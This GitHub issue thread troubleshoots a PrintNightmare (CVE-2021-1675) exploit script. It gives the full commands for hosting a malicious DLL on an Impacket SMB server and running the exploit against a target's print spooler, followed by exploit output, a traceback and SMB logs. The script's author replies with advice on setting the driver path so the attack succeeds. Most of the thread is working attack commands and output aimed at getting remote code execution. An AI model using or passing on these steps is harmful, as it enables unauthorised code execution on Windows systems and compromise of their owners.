impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION
sunny0day opened this issue · 4 comments
sunny0day commented
Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb
Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'
Exploit log:
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
SMB log:
[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)
Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)
Is anyone familiar with this error?
cube0x0 commented
paste full input and output please
cube0x0 commented
C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
cannot be used, remove it from args and let the script find the correct path or enum like below
Get-PrinterDriver |select Path
Path
----
C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\mxdwdrv.dll
sunny0day commented
@cube0x0 for your information, this is the result without specifying a path:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\\10.33.69.214\smb\whatanightmare.dll'
[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[-] pDriverPath C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL, expected :\Windows\System32\DriverStore\FileRepository\.....
[-] Specify pDriverPath manually